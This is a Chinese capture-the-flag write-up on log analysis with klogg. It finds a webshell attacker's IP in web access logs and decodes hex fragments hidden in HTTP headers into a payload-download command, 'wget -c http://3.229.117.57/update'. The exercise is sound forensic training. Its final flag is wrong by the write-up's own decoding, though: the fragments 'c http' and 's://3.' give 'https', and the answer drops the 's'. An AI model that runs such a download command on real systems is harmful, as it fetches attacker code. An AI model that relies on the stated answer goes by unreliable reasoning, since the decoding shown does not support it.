【CTF-MISC-日志分析】使用klogg分析日志内容

工具

klogg 22.06.0.1289:https://github.com/variar/klogg/releases/tag/v22.06

第一题

题目描述

你是一名安全分析师,公司的Web服务器可能被攻击者植入了后门。
请分析提供的访问日志,找出以下信息:
攻击者使用的恶意IP地址是什么?flag格式:flag{IP地址},例如flag{192.168.10.10}

解析

用klogg打开日志,勾选Enable regular expression logical combining的功能,然后输入命令:
“cmd” or “shell”
搜索到了198.51.100.42这个地址相关的请求shell和cmd明显恶意文件
所以这个IP就是地址

198.51.100.42--[16/Jun/2023:00:16:10+0000]"GET /cmd.php?id=328491&action=update&token=731053 HTTP/1.1"301 1061"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""X-Custom-Header:733a2f2f332e"198.51.100.42--[16/Jun/2023:00:16:33+0000]"GET /shell.php?id=996606&action=edit&token=650160 HTTP/1.1"304 2471"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""X-Custom-Header:372e35372f75"198.51.100.42--[16/Jun/2023:00:15:53+0000]"GET /cmd.php?id=689443&action=delete&token=981439 HTTP/1.1"200 7233"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0""X-Forwarded-For:127.0.0.1, 632068747470"198.51.100.42--[16/Jun/2023:00:16:46+0000]"GET /webshell.php?id=465538&action=view&token=504473 HTTP/1.1"302 1755"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""Authorization:Bearer 7064617465"

答案

答案:flag{198.51.100.42}

第二题

题目描述

攻击者执行的完整命令是什么?最终提交flag格式为flag{执行的完整命令},如flag{ls -la /tmp}

解析

由第一题可知,攻击者是在16/Jun/2023:00:15到16/Jun/2023:00:16之间执行的恶意请求,所以我们要查看攻击者在16/Jun/2023:00:10到16/Jun/2023:00:19之间的所有日志信息,输入命令:
“198.51.100.42” and “16/Jun/2023:00:1”

按时间顺序排列:

198.51.100.42--[16/Jun/2023:00:15:35+0000]"GET /system.php?id=897641&action=edit&token=422278 HTTP/1.1"302 9812"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""Via:1.1 proxy1, 1.1 proxy2, 77676574202d"198.51.100.42--[16/Jun/2023:00:15:53+0000]"GET /cmd.php?id=689443&action=delete&token=981439 HTTP/1.1"200 7233"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0""X-Forwarded-For:127.0.0.1, 632068747470"198.51.100.42--[16/Jun/2023:00:16:10+0000]"GET /cmd.php?id=328491&action=update&token=731053 HTTP/1.1"301 1061"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""X-Custom-Header:733a2f2f332e"198.51.100.42--[16/Jun/2023:00:16:21+0000]"GET /exec.php?id=713079&action=delete&token=150053 HTTP/1.1"502 5275"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""Via:1.1 proxy1, 1.1 proxy2, 3232392e3131"198.51.100.42--[16/Jun/2023:00:16:33+0000]"GET /shell.php?id=996606&action=edit&token=650160 HTTP/1.1"304 2471"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""X-Custom-Header:372e35372f75"198.51.100.42--[16/Jun/2023:00:16:46+0000]"GET /webshell.php?id=465538&action=view&token=504473 HTTP/1.1"302 1755"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""Authorization:Bearer 7064617465"

攻击者将命令拆分成多个部分隐藏在HTTP头中。

让我将这些十六进制编码片段按时间顺序拼接并解码

解码每个HTTP头中的十六进制数据:

  1. 00:15:35-77676574202dwget -
  2. 00:15:53-632068747470c http
  3. 00:16:10-733a2f2f332es://3.
  4. 00:16:21-3232392e3131229.11
  5. 00:16:33-372e35372f757.57/u
  6. 00:16:46-7064617465pdate

按时间顺序拼接:

wget - c http s://3. 229.11 7.57/u pdate

去掉空格并合理组合:
wget -c http://3.229.117.57/update

答案

答案:flag{wget -c http://3.229.117.57/update}